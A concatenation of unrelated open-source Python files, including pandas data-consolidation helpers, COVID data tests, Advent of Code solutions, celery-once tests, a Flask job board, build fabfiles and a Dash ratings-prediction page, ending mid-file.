'Missouri': 'Midwestern', 'Montana': 'Western', 'Nebraska': 'Midwestern', 'Nevada': 'Western', 'New Hampshire': 'Northeastern', 'New Jersey': 'Northeastern',
'New Mexico': 'Western', 'New York': 'Northeastern', 'North Carolina': 'Southern', 'North Dakota': 'Midwestern', 'Ohio': 'Midwestern', 'Oklahoma': 'Southern',
'Oregon': 'Western', 'Pennsylvania': 'Northeastern', 'Rhode Island': 'Northeastern', 'South Carolina': 'Southern', 'South Dakota': 'Midwestern',
'Tennessee': 'Southern', 'Texas': 'Southern', 'Utah': 'Western', 'Vermont': 'Northeastern', 'Virginia': 'Southern', 'Washington': 'Western',
'West Virginia': 'Southern', 'Wisconsin': 'Midwestern', 'Wyoming': 'Western', 'District of Columbia' : 'Southern'}
state_region = pd.DataFrame.from_dict(state_region, orient='index')
state_region = state_region.reset_index()
state_region.columns = ['State', 'Region']
right = 'State'
df = df.merge(state_region, how='outer', left_on=left, right_on=right)
return df
########### Consolidating Data ##########
### Location
def consolidate_sell_pop(location_house_sell_time, location_state_pop):
location_house_sell_time.columns = ['state', 'year', 'days_to_sell']
location_state_pop.columns = ['state', 'year', 'population']
merged_loc = location_house_sell_time.merge(location_state_pop, left_on= ['state', 'year'], right_on= ['state', 'year'], how='inner')
return merged_loc
def consolidate_sale_rent(location_rental_prices, location_house_prices):
location_rental_prices.columns = ['state', 'size', 'year', 'rent_value']
location_house_prices.columns = ['state', 'size', 'year', 'sell_value']
housing_merged_loc = location_rental_prices.merge(location_house_prices, left_on= ['state', 'size', 'year'], right_on= ['state', 'size', 'year'], how='inner')
return housing_merged_loc
def group_state_degree_data(df):
loc_field_focus = df.groupby(['State','Field'])['value'].sum().reset_index()
loc_field_focus_totals = df.groupby(['State'])['value'].sum().reset_index()
loc_field_focus_totals['Field'] = 'Total'
state_ratio = loc_field_focus.append(loc_field_focus_totals)
final =state_ratio.pivot_table(index = 'State', columns = 'Field', values = 'value')
final = append_zscores(final, 'Total', 'Total_z')
return final
def group_age_degree_data(df):
loc_age_focus = df.groupby(['Age Group','Field'])['value'].sum().reset_index()
loc_age_totals = df.groupby(['Age Group'])['value'].sum().reset_index()
loc_age_totals['Field'] = 'Total'
age_ratio = loc_age_focus.append(loc_age_totals)
final =age_ratio.pivot_table(index = 'Age Group', columns = 'Field', values = 'value')
final = append_zscores(final, 'Total', 'Total_z')
return final
def get_rent_sale_growth():
location_rental_prices = pd.read_csv('Final_Data/ETL/zillow_rental_prices.csv')
location_house_prices = pd.read_csv('Final_Data/ETL/zillow_house_prices.csv')
housing_merged_loc = consolidate_sale_rent(location_rental_prices, location_house_prices)
h_m_17 = housing_merged_loc[housing_merged_loc['year'] == 2017]
h_m_20 = housing_merged_loc[housing_merged_loc['year'] == 2020]
h_m_17 = h_m_17[['state','size','rent_value', 'sell_value']]
h_m_20 = h_m_20[['state','size','rent_value', 'sell_value']]
h_m_17_1 = h_m_17[h_m_17['size'] == '1br']
h_m_17_2 = h_m_17[h_m_17['size'] == '2br']
h_m_17_3 = h_m_17[h_m_17['size'] == '3br']
h_m_17_4 = h_m_17[h_m_17['size'] == '4br']
h_m_20_1 = h_m_20[h_m_20['size'] == '1br']
h_m_20_2 = h_m_20[h_m_20['size'] == '2br']
h_m_20_3 = h_m_20[h_m_20['size'] == '3br']
h_m_20_4 = h_m_20[h_m_20['size'] == '4br']
h_m_17_1 = h_m_17_1[['state', 'rent_value', 'sell_value']]
h_m_17_2 = h_m_17_2[['state', 'rent_value', 'sell_value']]
h_m_17_3 = h_m_17_3[['state', 'rent_value', 'sell_value']]
h_m_17_4 = h_m_17_4[['state', 'rent_value', 'sell_value']]
h_m_20_1 = h_m_20_1[['state', 'rent_value', 'sell_value']]
h_m_20_2 = h_m_20_2[['state', 'rent_value', 'sell_value']]
h_m_20_3 = h_m_20_3[['state', 'rent_value', 'sell_value']]
h_m_20_4 = h_m_20_4[['state', 'rent_value', 'sell_value']]
h_m_17_1.columns = ['state', 'rent_value_17_1', 'sell_value_17_1']
h_m_17_2.columns = ['state', 'rent_value_17_2', 'sell_value_17_2']
h_m_17_3.columns = ['state', 'rent_value_17_3', 'sell_value_17_3']
h_m_17_4.columns = ['state', 'rent_value_17_4', 'sell_value_17_4']
h_m_20_1.columns = ['state', 'rent_value_20_1', 'sell_value_20_1']
h_m_20_2.columns = ['state', 'rent_value_20_2', 'sell_value_20_2']
h_m_20_3.columns = ['state', 'rent_value_20_3', 'sell_value_20_3']
h_m_20_4.columns = ['state', 'rent_value_20_4', 'sell_value_20_4']
merged_rent_sale = h_m_17_1.merge(h_m_17_2, on='state', how='outer')
merged_rent_sale = merged_rent_sale.merge(h_m_17_3, on='state', how='outer')
merged_rent_sale = merged_rent_sale.merge(h_m_17_4, on='state', how='outer')
merged_rent_sale = merged_rent_sale.merge(h_m_20_1, on='state', how='outer')
merged_rent_sale = merged_rent_sale.merge(h_m_20_2, on='state', how='outer')
merged_rent_sale = merged_rent_sale.merge(h_m_20_3, on='state', how='outer')
merged_rent_sale = merged_rent_sale.merge(h_m_20_4, on='state', how='outer')
return merged_rent_sale
#### Degree
def combine_demand(education_industry_counts, education_deg_to_job, education_deg_payback,location_state_sex_deg ):
industry_demand = education_industry_counts.groupby('category')['Count'].sum().to_frame()
degree_fill_count = education_deg_to_job.groupby('category')['count'].sum().to_frame()
degree_mean = education_deg_payback.groupby('Category').mean()
degrees_completed = location_state_sex_deg.groupby('Field')['value'].sum().to_frame()
industry_demand = industry_demand.reset_index()
industry_demand.columns = ['Field', 'Demand_Count']
degree_fill_count = degree_fill_count.reset_index()
degree_fill_count.columns = ['Field', 'Degree_Fill_Count']
degree_mean = degree_mean.reset_index()
degree_mean.columns = ['Field', 'start_salary', 'mid_salary']
degrees_completed = degrees_completed.reset_index()
degrees_completed.columns = ['Field', 'bachelor_count']
dfs = industry_demand.merge(degree_fill_count, on='Field', how='inner')
dfs = dfs.merge(degree_mean, on='Field', how='inner')
dfs = dfs.merge(degrees_completed, on='Field', how='inner')
return dfs
def append_zscores(df, col, newcol):
df[newcol] = (df[col] - df[col].mean())/df[col].std()
return df
#### Education
def get_regional_salaries(reg_salaries):
reg_salaries = reg_salaries.groupby('Region').mean()
return reg_salaries
def get_bachelor_ratios(bachelor_counts):
bachelor_ratio = bachelor_counts.copy()
bachelor_ratio['Arts, Humanities and Others'] = bachelor_ratio['Arts, Humanities and Others']/bachelor_ratio['Total']
bachelor_ratio['Business'] = bachelor_ratio['Business']/bachelor_ratio['Total']
bachelor_ratio['Education'] = bachelor_ratio['Education']/bachelor_ratio['Total']
bachelor_ratio['Sci_Eng_Related'] = bachelor_ratio['Sci_Eng_Related']/bachelor_ratio['Total']
bachelor_ratio['Science and Engineering'] = bachelor_ratio['Science and Engineering']/bachelor_ratio['Total']
return bachelor_ratio
``` |
{
"source": "joshfinney/COVID-19-Data-Hub",
"score": 2
} |
#### File: joshfinney/COVID-19-Data-Hub/test_covid_data_handler.py
```python
from covid_data_handler import delete_update, hhmm_to_seconds, parse_csv_data, update_news, process_covid_csv_data, covid_API_request, schedule_covid_updates, get_updated, parse_json_data
from random import randint
import sched, time, logging
def test_all():
test_get_updated()
test_parse_csv_data()
test_process_covid_csv_data()
test_covid_API_request()
test_parse_json_data()
test_hhmm_to_seconds()
test_schedule_covid_updates()
test_update_news()
test_delete_update()
logging.info("COVID data handling test completed")
def test_get_updated():
assert isinstance(get_updated(),bool)
def test_parse_csv_data():
data = parse_csv_data('nation_2021-10-28.csv')
assert len(data) == 639
def test_process_covid_csv_data():
last7days_cases , current_hospital_cases , total_deaths = process_covid_csv_data (parse_csv_data('nation_2021-10-28.csv'))
assert str(last7days_cases) == "240299"
assert str(current_hospital_cases) == "7019"
assert str(total_deaths) == "141544"
def test_covid_API_request():
data = covid_API_request(location='Exeter',location_type='ltla')
assert isinstance(data, dict)
def test_parse_json_data():
assert isinstance(parse_json_data(covid_API_request(location='Exeter',location_type='ltla'),0),dict)
def test_hhmm_to_seconds():
test_time_input_1 = randint(0,23)
test_time_input_2 = randint(0,59)
test_time:str
if test_time_input_1 < 10:
test_time = "0" + str(test_time_input_1) + ":"
else:
test_time = str(test_time_input_1) + ":"
if test_time_input_2 < 10:
test_time = test_time + "0" + str(test_time_input_1)
else:
test_time = test_time + str(test_time_input_2)
assert isinstance(hhmm_to_seconds(test_time), int)
def test_schedule_covid_updates():
schedule_covid_updates(update_interval=10, update_name='update test',location='Exeter',location_type='ltla')
def test_update_news():
update_news()
def test_delete_update():
delete_update("Exeter COVID-19 data update")
logging.basicConfig(
filename='logging.log',
level=logging.INFO,
format='%(asctime)s:%(levelname)s:%(message)s'
)
test_scheduler = sched.scheduler(time.time,time.sleep)
test_scheduler.enter(60*60,1,test_all)
test_scheduler.run()
``` |
{
"source": "joshfinnie/advent-of-code",
"score": 3
} |
#### File: 2020/day-01/part2.py
```python
import sys
def get_values(arr):
sum = 2020
for i in arr:
for j in arr:
for z in arr:
if i + j + z == sum:
return i * j * z
values = []
with open(sys.argv[1]) as inputfile:
for lines in inputfile:
values.append(int(lines))
print(get_values(values))
```
#### File: 2020/day-03/part1.py
```python
import sys
def get_answer(arr):
tree_count = 0
x_pos = 0
y_pos = 0
x_offset = 1
y_offset = 3
width = len(arr[0])
height = len(arr)
while x_pos < height:
test = arr[x_pos][y_pos]
if test == "#":
tree_count += 1
x_pos = x_pos + x_offset
y_pos = (y_pos + y_offset) % width
return tree_count
with open(sys.argv[1]) as f:
print(get_answer([l.strip() for l in f if l.strip()]))
```
#### File: 2020/day-05/part2.py
```python
import sys
def get_answers(arr):
possible_seats = set(range(1024))
for a in arr:
a = a.replace("F", "0").replace("B", "1")
a = a.replace("R", "1").replace("L", "0")
seat = int(a, 2)
possible_seats.remove(seat)
for seat in possible_seats:
if seat - 1 not in possible_seats and seat + 1 not in possible_seats:
return seat
with open(sys.argv[1]) as f:
arr = [l.strip() for l in f if l.strip()]
print(get_answers(arr))
``` |
{
"source": "joshfinnie/celery-once",
"score": 2
} |
#### File: tests/integration/test_integration.py
```python
from celery import Celery
from celery_once import QueueOnce, AlreadyQueued
from freezegun import freeze_time
import pytest
app = Celery()
app.conf.ONCE_REDIS_URL = 'redis://localhost:1337/0'
app.conf.ONCE_DEFAULT_TIMEOUT = 30 * 60
app.conf.CELERY_ALWAYS_EAGER = True
@app.task(name="example", base=QueueOnce, once={'keys': ['a']})
def example(redis, a=1):
return redis.get("qo_example_a-1")
def test_delay_1(redis):
result = example.delay(redis)
assert result.get() is not None
redis.get("qo_example_a-1") is None
def test_delay_2(redis):
redis.set("qo_example_a-1", 10000000000)
try:
example.delay(redis)
pytest.fail("Didn't raise AlreadyQueued.")
except AlreadyQueued:
pass
@freeze_time("2012-01-14") # 1326499200
def test_delay_3(redis):
redis.set("qo_example_a-1", 1326499200 - 60 * 60)
example.delay(redis)
def test_apply_async_1(redis):
result = example.apply_async(args=(redis, ))
assert result.get() is not None
redis.get("qo_example_a-1") is None
def test_apply_async_2(redis):
redis.set("qo_example_a-1", 10000000000)
try:
example.apply_async(args=(redis, ))
pytest.fail("Didn't raise AlreadyQueued.")
except AlreadyQueued:
pass
def test_apply_async_3(redis):
redis.set("qo_example_a-1", 10000000000)
result = example.apply_async(args=(redis, ), once={'graceful': True})
assert result is None
@freeze_time("2012-01-14") # 1326499200
def test_apply_async_4(redis):
redis.set("qo_example_a-1", 1326499200 - 60 * 60)
example.apply_async(args=(redis, ))
def test_redis():
assert example.redis.connection_pool.connection_kwargs['host'] == "localhost"
assert example.redis.connection_pool.connection_kwargs['port'] == 1337
assert example.redis.connection_pool.connection_kwargs['db'] == 0
def test_default_timeout():
assert example.default_timeout == 30 * 60
```
#### File: tests/unit/test_task.py
```python
from celery import task
from celery_once.tasks import QueueOnce, AlreadyQueued
from freezegun import freeze_time
import pytest
@task(name='simple_example', base=QueueOnce)
def simple_example():
return "simple"
@task(name='args_example', base=QueueOnce)
def args_example(a, b):
return a + b
@task(name='select_args_example', base=QueueOnce, once={'keys': ['a']})
def select_args_example(a, b):
return a + b
def test_get_key_simple():
assert "qo_simple_example" == simple_example.get_key()
def test_get_key_args_1():
assert "qo_args_example_a-1_b-2" == args_example.get_key(kwargs={'a':1, 'b': 2})
def test_get_key_args_2():
assert "qo_args_example_a-1_b-2" == args_example.get_key(args=(1, 2, ))
def test_get_key_select_args_1():
assert "qo_select_args_example_a-1" == select_args_example.get_key(kwargs={'a':1, 'b': 2})
@freeze_time("2012-01-14") # 1326499200
def test_raise_or_lock(redis):
assert redis.get("test") is None
QueueOnce().raise_or_lock(key="test", expires=60)
assert redis.get("test") is not None
assert redis.ttl("test") == 60
@freeze_time("2012-01-14") # 1326499200
def test_raise_or_lock_locked(redis):
# Set to expire in 30 seconds!
redis.set("test", 1326499200 + 30)
with pytest.raises(AlreadyQueued) as e:
QueueOnce().raise_or_lock(key="test", expires=60)
assert e.value.countdown == 30
assert e.value.message == "Expires in 30 seconds"
@freeze_time("2012-01-14") # 1326499200
def test_raise_or_lock_locked_and_expired(redis):
# Set to have expired 30 ago seconds!
redis.set("test", 1326499200 - 30)
QueueOnce().raise_or_lock(key="test", expires=60)
assert redis.get("test") is not None
assert redis.ttl("test") == 60
def test_clear_lock(redis):
redis.set("test", 1326499200 + 30)
QueueOnce().clear_lock("test")
assert redis.get("test") is None
``` |
{
"source": "joshfinnie/Flask-Job-Board",
"score": 2
} |
#### File: Flask-Job-Board/flask-job-board/app.py
```python
import os
from datetime import datetime
from urlparse import urlparse
from flask import Flask, render_template, request, redirect, url_for, flash, session
from flaskext.seasurf import SeaSurf
from flaskext.bcrypt import Bcrypt
from flaskext.gravatar import Gravatar
from functools import wraps
import settings
from mongoengine import connect, Document, StringField, EmailField, DateTimeField, URLField
app = Flask(__name__)
app.config.from_object(settings)
csrf = SeaSurf(app)
bcrypt = Bcrypt(app)
gravatar = Gravatar(app, size=160, default='mm')
database = urlparse(os.environ.get('MONGOHQ_URL', 'mongodb://localhost/flask-job-board'))
connect(database.path[1:],
host=database.hostname,
port=database.port,
username=database.username,
password=<PASSWORD>)
class User(Document):
username = StringField(required=True)
email = EmailField(required=True)
first_name = StringField(max_length=50)
last_name = StringField(max_length=50)
location = StringField()
homepage = StringField()
passhash = StringField()
created = DateTimeField()
meta = {
'ordering': ['-created']
}
class Job(Document):
company_name = StringField(required=True)
company_location = StringField(required=True)
company_url = URLField(required=True)
job_title = StringField(required=True)
job_posting = StringField(required=True)
application_instructions = StringField(required=True)
created = DateTimeField()
meta = {
'ordering': ['-created']
}
def login_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if session.get("logged_in"):
return f(*args, **kwargs)
else:
flash(u'Login is required.', 'warning')
return redirect(url_for('login', next=request.url))
return decorated_function
@app.template_filter()
def timesince(dt, default="just now"):
"""
Returns string representing "time since" e.g.
3 days ago, 5 hours ago etc.
"""
now = datetime.utcnow()
diff = now - dt
periods = (
(diff.days / 365, "year", "years"),
(diff.days / 30, "month", "months"),
(diff.days / 7, "week", "weeks"),
(diff.days, "day", "days"),
(diff.seconds / 3600, "hour", "hours"),
(diff.seconds / 60, "minute", "minutes"),
(diff.seconds, "second", "seconds"),
)
for period, singular, plural in periods:
if period:
return "%d %s ago" % (period, singular if period == 1 else plural)
return default
@app.route("/")
def home():
jobs = Job.objects.all()
return render_template('home.html', jobs=jobs)
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/contact')
def contact():
return render_template('contact.html')
@app.route('/create', methods=['GET', 'POST'])
@login_required
def create_job():
if request.method == 'POST':
job = Job(company_name=request.form['company_name'])
job.company_location=request.form['company_location']
company_url=request.form['company_url']
if company_url[:4] == 'http':
job.company_url=company_url
else:
job.company_url='http://'+company_url
job.job_title=request.form['job_title']
job.job_posting=request.form['job_posting']
job.application_instructions=request.form['application_instructions']
job.created=datetime.utcnow()
job.save()
next_url = job.id
flash(u'Job successfully created.', 'success')
return redirect(url_for('show_job', job_id=next_url))
else:
return render_template('create_job.html')
@app.route('/signup', methods=['GET', 'POST'])
def signin():
if request.method == 'POST':
if request.form['password'] == request.form['password2']:
user = User(username=request.form['username'])
user.email=request.form['email']
user.first_name=request.form['first_name']
user.last_name=request.form['last_name']
user.location='None'
user.passhash=<PASSWORD>.generate_password_hash(request.form['password'])
user.homepage='None'
user.created=datetime.utcnow()
user.save()
user_id=user.id
session['username'] = user.username
session['logged_in'] = True
flash(u'Successfully created new user.', 'success')
return redirect(url_for('show_user', user_id=user_id))
else:
flash(u'Passwords do not match.', 'error')
return render_template('create_user.html')
else:
return render_template('create_user.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
next = request.values.get('next', '')
if request.method == 'POST':
try:
user = User.objects.get(username=request.form['username'])
except User.DoesNotExist:
flash(u'Password or Username is incorrect.', 'error')
return render_template('login.html')
else:
if not bcrypt.check_password_hash(user.passhash, request.form['password']):
flash(u'Password or Username is incorrect.', 'error')
return render_template('login.html')
else:
session['username'] = user.username
session['logged_in'] = True
flash(u'You have been successfully logged in.', 'success')
return redirect(next or url_for('home'))
return render_template('login.html')
@app.route('/logout')
def logout():
session.pop('username', None)
session.pop('logged_in', None)
flash(u'You have been successfully logged out.', 'info')
return redirect(url_for('home'))
@app.route('/settings', methods=['GET', 'POST'])
@login_required
def settings():
if request.method == 'POST':
user=User.objects.get(username=session.get('username'))
user.email=request.form['email']
user.first_name=request.form['first_name']
user.last_name=request.form['last_name']
user.location=request.form['location']
user.homepage=request.form['homepage']
user.save()
user_id=user.id
flash(u'Profile was successfully updated.', 'success')
return redirect(url_for('show_user', user_id=user_id))
else:
user=User.objects.get(username=session.get('username'))
return render_template('settings.html', user=user)
@app.route('/user/<user_id>')
def show_user(user_id):
user = User.objects.with_id(user_id)
return render_template('show_user.html', user=user)
@app.route('/job/<job_id>')
def show_job(job_id):
job = Job.objects.with_id(job_id)
return render_template('show_job.html', job=job)
@app.route('/users')
def show_all_users():
users = User.objects.all()
return render_template('show_all_users.html', users=users)
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
if __name__ == "__main__":
port = int(os.environ.get("PORT", 5000))
app.debug = True
app.run(host='0.0.0.0', port=port)
``` |
{
"source": "joshfinnie/p.jfin.us",
"score": 2
} |
#### File: joshfinnie/p.jfin.us/fabfile.py
```python
from fabric.api import *
import fabric.contrib.project as project
import os
import sys
import SimpleHTTPServer
import SocketServer
def clean():
if os.path.isdir(DEPLOY_PATH):
local('rm -rf {deploy_path}'.format(**env))
local('mkdir {deploy_path}'.format(**env))
def build():
local('pelican -s pelicanconf.py')
def rebuild():
clean()
build()
def regenerate():
local('pelican -r -s pelicanconf.py')
def serve():
os.chdir(env.deploy_path)
PORT = 8000
class AddressReuseTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
server = AddressReuseTCPServer(('', PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
server.serve_forever()
def reserve():
build()
serve()
def preview():
local('pelican -s publishconf.py')
``` |
{
"source": "joshfire/joshfire-framework",
"score": 3
} |
#### File: examples/rss4/fabfile.py
```python
from fabric.api import *
import os
import sys
sys.path.append("../../build")
from joshfabric import *
def export():
local("rm -rf export/")
local("mkdir -p export/")
for f in ["public", "src", "joshfire"]:
local("cp -RL %s export/" % f)
def phonegap():
"EXPORT: export app to phonegap"
export()
if not os.path.isdir("phonegap"):
print "Your phonegap project must be in phonegap/ ; We'll replace the phonegap/www/ directory"
sys.exit(1)
local("rm -rf phonegap/www/* && mkdir -p phonegap/www/")
local("cp -R export/* phonegap/www/")
switchfile = """<html>
<head>
<style>
html,body { background-color:black; }
</style>
</head>
<body>
<script>
window.location = "public/index.ios.html";
</script>
</body>
</html>
"""
f = open("phonegap/www/index.html", "w")
f.write(switchfile)
f.close()
```
#### File: joshfire/joshfire-framework/fabfile.py
```python
from fabric.api import *
import fabric.colors
import os
import re
import sys
import datetime
sys.path.append("build")
from joshfabric import *
try:
import json
except:
import simplejson as json
"""
Bootstrap generation
"""
def bootstraps():
"""
Builds bootstrap files for each adapter
"""
requirejs = open("lib/vendor/require.js").read()
# requirejs_node = open("lib/vendor/require.node.js").read()
namespace = open("lib/global.js").read()
adapters = os.listdir("lib/adapters/")
def listSources(adapterpath):
sources = []
for (path, dirs, files) in os.walk("lib/adapters/%s/" % adapterpath):
for f in files:
if re.match('.*\.js$', f):
sources += [os.path.join(path.replace("lib/adapters/%s/" % adapterpath, ""), f)[0:-3]]
sources.remove("global")
try:
sources.remove("bootstrap")
except:
pass
return sources
for c in adapters:
# skip useless directories
if(re.match('\.DS_Store', c)):
continue
sources = {}
namespace_adapter = open("lib/adapters/%s/global.js" % c).read()
# todo replace by some jseval().
adapter_deps = re.search(
"J(oshfire)?\.adapterDeps\s*\=\s*([^\;]+)\;", namespace_adapter)
deps = [c]
if adapter_deps:
deps += json.loads(adapter_deps.group(2).replace("'", '"'))
for d in deps:
sources[d] = listSources(d)
patched_namespace = namespace
patched_namespace = patched_namespace.replace(
"JOSHFIRE_REPLACEME_ADAPTER_MODULES", json.dumps(sources))
patched_namespace = patched_namespace.replace(
"JOSHFIRE_REPLACEME_ADAPTER_ID", json.dumps(c))
bootstrap = __getCopyrightHeader() + "\n\n"
if c == "node":
print "We no longer handle node adapter"
# bootstrap += patched_namespace + namespace_adapter + requirejs + requirejs_node + open("lib/adapters/%s/global.exec.js" % c).read()
# patch needed in require.js
# bootstrap = bootstrap.replace("var require, define;", "")
else:
bootstrap += requirejs + patched_namespace + namespace_adapter
print "Writing %s ..." % ("lib/adapters/%s/bootstrap.js" % c)
open("lib/adapters/%s/bootstrap.js" % c, "w").write(bootstrap)
open("lib/adapters/%s/modules.json" % c, "w").write(
json.dumps(sources))
def _getFinalTarGzName():
package = json.load(open("package.json", "r"))
version = package["version"]
finalname = "joshfire-framework-%s.tar.gz" % version
return finalname
# release
def targz():
finalname = _getFinalTarGzName()
local("rm -rf export/")
local("mkdir -p export/")
local("git archive --format=tar -o export/a.tar HEAD")
local("cd export && tar xvf a.tar && rm a.tar")
# fix some files
local("rm export/lib/uielements/forminput.js")
# include optimized builds in examples
optimizeexamples()
local("cp -R examples/videolist/export export/examples/videolist/")
local("cd export && tar czvf %s *" % finalname)
return finalname
def prod():
env.hosts = ['joshfire.com']
env.path = '/home/mikiane/joshfiredocs'
env.user = 'mikiane'
def targzup():
targz()
finalname = _getFinalTarGzName()
run("mkdir -p %s/shared/downloads/" % env.path)
put('export/%s' % finalname, '%s/shared/downloads/%s' % (env.path,
finalname))
"""
Code quality checking
"""
def jslint(files=0):
"""
Checks js files using JSLint
"""
files = files.split(" ") if not files == 0 else list_js_files()
for file in files:
with settings(hide("warnings", "running"), warn_only=True):
# output = local("jslint -nologo -conf build/jsl.conf -process %s"
# % file, True)
output = local("jslint %s" % file, True)
if output.endswith("No errors found.") == True:
print fabric.colors.green("OK ", True) + file
else:
print fabric.colors.red("KO ", True) + file
print output[output.find("\n"):]
def jshint(files=0):
"""
Checks js files using JSHint
"""
files = files.split(" ") if not files == 0 else list_js_files()
for file in files:
with settings(hide("warnings", "running"), warn_only=True):
output = local("jshint %s" % file, True)
if output.endswith("OK!") == True:
print fabric.colors.green("OK ", True) + file
else:
print fabric.colors.red("KO ", True) + file
print output
def gjslint(files=0):
"""
Checks js files using gjslint for compliance with Google coding style
"""
files = files.split(" ") if not files == 0 else list_js_files()
for file in files:
with settings(hide("warnings", "running"), warn_only=True):
output = local("gjslint --strict --custom_jsdoc_tags function,namespace,constructs,options,augments,static,extend %s" % file, True)
offset = output.find("\nSome of the errors")
if offset == -1:
print fabric.colors.green("OK ", True) + file
else:
print fabric.colors.red("KO ", True) + file
print output[output.find("\n"):offset]
def optimizeexamples():
local("cd examples/videolist/ && fab optimize")
"""
Reindent & apply Google coding style
"""
"""
Generate API documentation
"""
def jsdoc(files=0):
files = files.split(" ") if not files == 0 else list_js_files(dirs=["lib"])
export = "doc/content/api"
local("rm -rf ./%s/*" % export)
local("java -jar build/jsdoc-toolkit/jsrun.jar build/jsdoc-toolkit/app/run.js -a -c=build/jsdoc-toolkit/jsdoc.conf -d=%s -t=build/jsdoc-toolkit/templates/jsdoc-tably-joshfire %s" % (export, " ".join(files)))
"""
local("wkhtmltopdf %s/*.html %s/symbols/*.html %s/JoshfireApiReference.pdf", (export, export, export))
local("rm -rf doc/lib/jsdoc/*")
local("java -jar build/jsdoc-toolkit/jsrun.jar build/jsdoc-toolkit/app/run.js -a -t=build/jsdoc-toolkit/templates/jsdoc-rst -c=build/jsdoc-toolkit/jsdoc.conf -d=doc/jsdoc-html %s" % " ".join(files))
"""
def pdfdoc():
print "www-joshfire must be running on localhost:40009 !"
doc_content = list_js_files(
dirs=["doc/content/"], excluded_dirs="api", extension=".html")
requests = ["http://localhost:40009/doc/dev/%s" % re.sub(
"(index)?\.html$", "", x[13:]) for x in doc_content]
os.system("rm -rf doc/export/pdfdoc/")
os.system("mkdir -p doc/export/pdfdoc/")
output_files = []
for r in requests:
output_files.append("doc/export/pdfdoc/%sx.html" % r[31:])
os.system("mkdir -p %s" % (os.path.dirname(output_files[-1])))
os.system("curl %s -o %s" % (r, output_files[-1]))
os.system("wkhtmltopdf %s doc/export/pdfdoc/JoshfireDoc.pdf" % (
" ".join(output_files)))
def fix(files=0):
"""
Alias on fixjsstyle
"""
fixjsstyle(files)
def fixjsstyle(files=0):
"""
Fix js files using fixjsstyle to comply with Google coding style
"""
files = files.split(" ") if not files == 0 else list_js_files()
for file in files:
with settings(hide("warnings", "running"), warn_only=True):
output = local("fixjsstyle --strict --custom_jsdoc_tags function,namespace,constructs,options,augments,static,extend %s" % file, True)
if output == "":
print fabric.colors.white("CLEAN ", True) + file
else:
print fabric.colors.green("FIXED ", True) + file
print output
# ugly patch to properly indent JSDoc comments since fixjsstyle does not
file = open(file, "r+")
lines = file.readlines()
idx = 0
while idx < len(lines):
if lines[idx].strip()[0:2] == '/*':
level = lines[idx].find('/*')
idx += 1
while idx < len(lines):
lines[idx] = " " * level + lines[idx].strip() + "\n"
if lines[idx].find('*/') != -1:
break
idx += 1
idx += 1
file.seek(0)
file.truncate()
file.write("".join(lines))
file.close()
def preparerelease():
optimizeexamples()
jsdoc()
fixjsstyle()
fixjsstyle()
copyright()
bootstraps()
# todo tests once more
def copyright(files=0):
"""
Add copyright header to source files
"""
header = __getCopyrightHeader().split("\n") + ['', '']
# Add
files = files.split(" ") if not files == 0 else list_js_files()
for file in files:
name = file
buf = open(file, "r").read()
f = open(file, "w")
f.write("\n".join(header))
f.write(
re.compile("^\s*((\/\*\!(.*?)\*\/)\s*)*", re.DOTALL).sub("", buf))
f.close()
print fabric.colors.green("COPYRIGHTED ", True) + name
def __getCopyrightHeader():
"""
Build the copyright header from the license template and the package version
"""
# Get framework version
file = open('package.json', 'r')
version = json.loads(file.read())['version']
file.close()
# Get header template
file = open('build/LICENSE.HEADER', 'r')
header = file.read()
file.close()
now = datetime.datetime.now()
header = header.replace('$VERSION', version).replace(
'$YEAR', str(now.year)).replace('$DATE', now.ctime())
return header
``` |
{
"source": "JoshFowlkes/amazon-ratings-dash-app",
"score": 3
} |
#### File: amazon-ratings-dash-app/pages/predictions.py
```python
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from joblib import load
from sklearn.impute import SimpleImputer
from app import app
pipeline = load('pages/pipeline.joblib')
column1 = dbc.Col(
[
dcc.Markdown(
"""
## Predictions
Below are a number of sliders that affect the outcome of our predictive modeling.
Price
"""
),
dcc.Slider(
id='price',
min=0,
max=250,
step=1,
value=20,
marks={n: str(n) for n in range(0,250,25)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Number Available in Stock
"""
),
dcc.Slider(
id='number_available_in_stock',
min=0,
max=95,
step=1,
value=20,
marks={n: str(n) for n in range(0,95,10)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Number of Reviews
"""
),
dcc.Slider(
id='number_of_reviews',
min=0,
max=1400,
step=1,
value=20,
marks={n: str(n) for n in range(0,1400,100)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Number of Answered Questions
"""
),
dcc.Slider(
id='number_of_answered_questions',
min=0,
max=40,
step=1,
value=20,
marks={n: str(n) for n in range(0,40,5)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Description? (1 for Yes, 0 for No)
"""
),
dcc.Slider(
id='new_description',
min=0,
max=1,
step=1,
value=0,
marks={n: str(n) for n in range(0,1,1)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Customer Written Reviews? (1 for Yes, 0 for No)
"""
),
dcc.Slider(
id='new_customer_reviews',
min=0,
max=1,
step=1,
value=0,
marks={n: str(n) for n in range(0,1,1)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Seller Answers Customer Questions? (1 for Yes, 0 for No)
"""
),
dcc.Slider(
id='new_customer_questions_and_answers',
min=0,
max=1,
step=1,
value=0,
marks={n: str(n) for n in range(0,1,1)},
className='mb-5',
updatemode='drag',
),
dcc.Markdown(
"""
Product Information Section? (1 for Yes, 0 for No)
"""
),
dcc.Slider(
id='new_product_information',
min=0,
max=1,
step=1,
value=0,
marks={n: str(n) for n in range(0,1,1)},
className='mb-5',
updatemode='drag',
),
],
md=5,
)
column2 = dbc.Col(
[
html.H2('Predicted Rating', className='mb-5'),
html.Div(id='prediction-content', className='lead'),
html.Img(src='assets/pdp3.png', className='img-fluid'),
dcc.Markdown(
"""
Important note: most of the adjustable parameters listed on the left operate best within a limited range, and outside of that range the results become less reliable.
For example, as illustrated in the graph above, the majority of the items in the dataset behind this predictive model were priced at $50 or less,
